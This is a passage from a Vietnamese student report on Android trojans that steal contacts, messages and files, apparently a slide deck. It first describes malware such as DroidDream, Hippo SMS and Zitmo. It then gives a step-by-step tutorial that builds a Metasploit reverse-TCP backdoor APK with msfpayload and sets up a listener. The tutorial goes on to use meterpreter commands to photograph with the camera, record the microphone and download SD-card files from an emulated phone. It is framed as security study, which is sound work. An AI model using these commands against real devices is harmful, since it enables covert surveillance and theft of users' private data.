phổ biến trong thời gian vừa qua đó là Malware 10 DroidDream. Malware này hoạt động qua 2 giai đoạn: - Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. - Giai đoạn 2 : Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Mục đích của Malware DroidDream
  • 11. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 11 4. Tạo mã độc trên Kali Linux để xâm nhập Android thực hiện khai thác data trong SD card , camera , mic của smartphone Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
  • 12. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Bấm vào Network Adapter và chọn Bridged: connection directly to the physical 12 network Bấm vào Edit -> Virtual Network Editor...
  • 13. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Trên phần Bridge (connect VMs directly to the external network) chọn adapter của 13 máy thật Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
  • 14. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Đầu tiên mở terminal 192.168.199.139 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP 14 của máy Kali gõ dòng lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/madoc.apk
  • 15. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng Lệnh trên sẽ tạo ra 1 file madoc.apk trên desktop của Kali, đây chính là một Metasploit 15 reverse tcp backdoor.
  • 16. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 16 Tiếp theo, gõ lệnh msfconsole
  • 17. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 17 Sau khi msfconsole load xong : ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. set lport 8080– nhập port giống với port khi tạo payload ở trên. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
  • 18. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- Thử với một máy sony xperia z giả lập, tải về madoc.apk, cài đặt và mở lên được giao 18 diện như dưới, nhấp vào nút reverse_tcp:
  • 19. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 19 Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
  • 20. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 20 Để xem thông tin về máy, nhập lệnh SysInfo  Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
  • 21. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- File hình đã chụp từ camera của máy android là XCCRDJmb.jpeg được lưu ở 21 /root của máy  Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 22. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 22  Lấy file từ sd card Để vào sdcard, nhập lệnh :cd /sdcard và lệnh ls để xem danh sách file, thư mục Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard Dùng lệnh cd /sdcard/Download để vào thư mục
  • 23. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 23 Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk Và file này sẽ được tải về thư mục root của máy Kali
  • 24. Đề tài : Nghiên cứu các trojan,malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài SVTT : Trần Trọng An ---------------------------------------------------------------------------------------------------------------------------- 24 Link slide : - Cài đặt Kali Linux : http://www.slideshare.net/anhhieu7/v-thanh-hiu-ci-t-kali-trn-vmware- 37275588?qid=dcdc75e1-7b02-4fd6-8961-9c6b938d5ae2&v=default&b=&from_search=1# - Tạo mã độc trên Kali Linux để xâm nhập Android : http://www.slideshare.net/anhhieu7/v-thanh- hiu-to-m-c-trn-kali -linux-xm-nhp-android Link youtube : - Cài đặt Kali Linux : https://www.youtube.com/watch?v=Y2qbLB8peJQ - Tạo mã độc trên Kali Linux để xâm nhập Android : http://youtu.be/twqDSszrQ1o